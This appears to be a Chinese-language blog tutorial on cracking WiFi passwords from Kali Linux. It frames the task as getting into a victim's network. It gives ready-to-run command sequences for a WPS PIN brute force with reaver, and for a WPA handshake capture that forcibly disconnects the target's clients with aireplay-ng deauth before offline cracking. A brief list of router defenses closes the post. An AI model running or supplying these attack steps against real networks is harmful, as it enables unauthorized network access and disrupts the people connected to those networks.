Kali系统下WiFi密码破解

发表于 | 更新于 | 分类于 | 浏览数
| 字数统计 902

在网络渗透中,能够接入被攻击者的网络至关重要,只要黑客接入你的网络,利用DNS欺骗,arp攻击等各种钓鱼技术,基本上就能获取一切信息,WIFI网络的安全性重要性不言而喻!

手机上有很多类似360免费WIFI和WIFI万能钥匙的软件,可以”破解”WIFI密码,实际上这类软件不是”破解”而是”偷”密码,这类软件在安装的时候会自动上传你家的WIFI密码,也有可能是你一不小心分享出去的!分享之后别人使用软件就能连上你家的WIFI了,一般来说,商家WIFI比较多。

常见的WIFI破解技术有2种:

攻击测试环境:kali linux 64位,可以安装双系统,如果用虚拟机的话必须要用外置USB网卡!

1.PIN

该技术主要利用路由器的wps功能的bug,PIN 码分前4 和后4,先破前4 只有最多一万个组合,破后4 中的前3 只有一千个组合,一共就是一万一千个密码组合。 10 的4 次方+10 的3 次方=11000 个密码组合。当reaver 确定前4 位PIN 密码后,其任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码!

主要攻击工具:reaver,该工具十分强大,有很多配置参数,这里只列出最简单的攻击步骤,仅供参考:

1
2
3
4
1.airmon-ng start wlan0 #启动网卡的监听模式
2.airodump-ng wlan0mon  #查看周围区域所有WIFI信号情况
3.reaver -i wlan0mon -b AP_MAC -vv  #开始pin
4.reaver -i wlan0mon -b AP_Mac -p WPS_PIN  #得到pin值获取密码

其实现在很多路由器都关闭了wps功能,所以没法pin,而且很多新的路由器都是防pin!

2.暴力穷尽破解

该技术理论上只要计算机计算能力够强大,没有什么密码破解不了!只是时间长短的问题.先抓握手包然后跑包!

主要工具: aircrack-ng

1
2
3
4
5
6
1.airmon-ng check kill        #kill一些无关进程
2.airmon-ng start wlan0       #开启网卡监听模式
3.airodump-ng wlan0mon        #查看周围区域所有WIFI信号情况
4.airodump-ng -c 信道 --bssid 目标mac -w wep wlan0mon   #开始抓包
5.airodump-ng -c 信道 --bssid 目标mac wlan0mon  #查看当前环境的WiFi连接情况
6.aireplay-ng --deauth 10000 -a 目标mac -c 客户端mac wlan0mon   #对连接到目标ap的客户端攻击,使其掉线,抓取握手包!

备注:抓包的关键是第6步抓取握手包,所谓握手包就是对方设备掉线后重新连接WIFI时候的数据包,只要抓到握手包就可以了。

拿到握手包后切换到windows系统,用EWSA等软件跑包,跑包速度看机器配置,主要是看显卡配置,本人笔记本i7+gt750M,一秒钟2万次,其实也看运气,如果是弱密码,分分钟钟的事情,如果是包含字母\标点符号\特殊符号的密码……那几乎不可能!

3.防备措施:

  1. 不要安装 xxx免费WIFI等软件,如果不小心把密码分享出去的话,只能改密码了!

  2. 关闭路由器wps功能.此功能大部分人都用不到

  3. 隐藏ssid.这样别人就搜不到你家的WIFI信号,虽然用途并不大

  4. 使用复杂密码,包含字母\标点符号\特殊符号!这招最有效